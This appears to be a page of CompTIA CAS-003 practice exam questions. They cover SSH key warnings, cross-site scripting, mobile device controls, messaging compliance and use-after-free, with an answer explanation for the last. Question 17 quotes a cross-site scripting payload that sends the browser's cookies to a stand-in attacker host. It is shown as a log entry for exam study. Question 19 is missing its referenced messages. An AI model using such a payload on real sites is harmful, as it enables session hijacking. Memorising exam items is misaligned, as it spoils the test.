Instant Access CompTIA.CAS-003.v2022-06-25.q354 Actual Practice Test Engine for Free (Page 5)

Question 16

An organization's network security administrator has been using an SSH connection to manage switches and routers for several years. After attempting to connect to a router, an alert appears on the terminal emulation software, warning that the SSH key has changed.
After confirming the administrator is using the typical workstation and the router has not been replaced, which of the following are the MOST likely explanations for the warning message? (Choose two.)

A.A MITM attack is being performed by an APT.
B.The SSH keys were given to another department.
C.The workstation is not syncing with the correct NTP server.
D.A key rotation has occurred as a result of an incident.
E.The terminal emulator does not support SHA-256.
F.An incorrect username or password was entered.

Question 17

A security administrator notices the following line in a server's security log:
<input name='credentials' type='TEXT' value='" + request.getParameter('><script> document.location='http://badsite.com/?q='document.cookie</script>') + "'; The administrator is concerned that it will take the developer a lot of time to fix the application that is running on the server. Which of the following should thesecurity administrator implement to prevent this particular attack?

A.WAF
B.Input validation
C.SIEM
D.Sandboxing
E.DAM

Question 18

A medical facility wants to purchase mobile devices for doctors and nurses. To ensure accountability, each individual will be assigned a separate mobile device. Additionally, to protect patients' health information, management has identified the following requirements:
Data must be encrypted at rest.
The device must be disabled if it leaves the facility.
The device must be disabled when tampered with.
Which of the following technologies would BEST support these requirements? (Select two.)

A.eFuse
B.MicroSD
C.GPS
D.Biometric
E.USB 4.1
F.NFC

Question 19

Providers at a healthcare system with many geographically dispersed clinics have been fined five times this year after an auditor received notice of the following SMS messages:

Which of the following represents the BEST solution for preventing future fines?

A.Implement FTP services between clinics to transmit text documents with the information.
B.Implement a secure text-messaging application for mobile devices and workstations.
C.Provide a courier service to deliver sealed documents containing public health informatics.
D.Implement a system that will tokenize patient numbers.
E.Write a policy requiring this information to be given over the phone only.

Question 20

Joe, a hacker, has discovered he can specifically craft a webpage that when viewed in a browser crashes the browser and then allows him to gain remote code execution in the context of the victim's privilege level. The browser crashes due to an exception error when a heap memory that is unused is accessed. Which of the following BEST describes the application issue?

A.Integer overflow
B.Click-jacking
C.Race condition
D.SQL injection
E.Use after free
F.Input validation

Correct Answer: E

Use-After-Free vulnerabilities are a type of memory corruption flaw that can be leveraged by hackers to execute arbitrary code.
Use After Free specifically refers to the attempt to access memory after it has been freed, which can cause a program to crash or, in the case of a Use-After-Free flaw, can potentially result in the execution of arbitrary code or even enable full remote code execution capabilities.
According to the Use After Free definition on the Common Weakness Enumeration (CWE) website, a Use After Free scenario can occur when "the memory in question is allocated to another pointer validly at some point after it has been freed. The original pointer to the freed memory is used again and points to somewhere within the new allocation. As the data is changed, it corrupts the validly used memory; this induces undefined behavior in the process."
Incorrect Answers:
A: Integer overflow is the result of an attempt by a CPU to arithmetically generate a number larger than what can fit in the devoted memory storage space. Arithmetic operations always have the potential of returning unexpected values, which may cause an error that forces the whole program to shut down. This is not what is described in this question.
B: Clickjacking is a malicious technique of tricking a Web user into clicking on something different from what the user perceives they are clicking on, thus potentially revealing confidential information or taking control of their computer while clicking on seemingly innocuous web pages. This is not what is described in this question.
C: A race condition is an undesirable situation that occurs when a device or system attempts to perform two or more operations at the same time, but because of the nature of the device or system, the operations must be done in the proper sequence to be done correctly. This is not what is described in this question.
D: SQL injection is a type of security exploit in which the attacker adds Structured Query Language (SQL) code to a Web form input box to gain access to resources or make changes to data. This is not what is described in this question.
F: Input validation is used to ensure that the correct data is entered into a field. For example, input validation would prevent letters typed into a field that expects number from being accepted. This is not what is described in this question.
References:
http://www.webopedia.com/TERM/U/use-after-free.html
https://en.wikipedia.org/wiki/Clickjacking
http://searchstorage.techtarget.com/definition/race-condition

Question 16

Question 17

Question 18

Question 19

Question 20

Download PDF File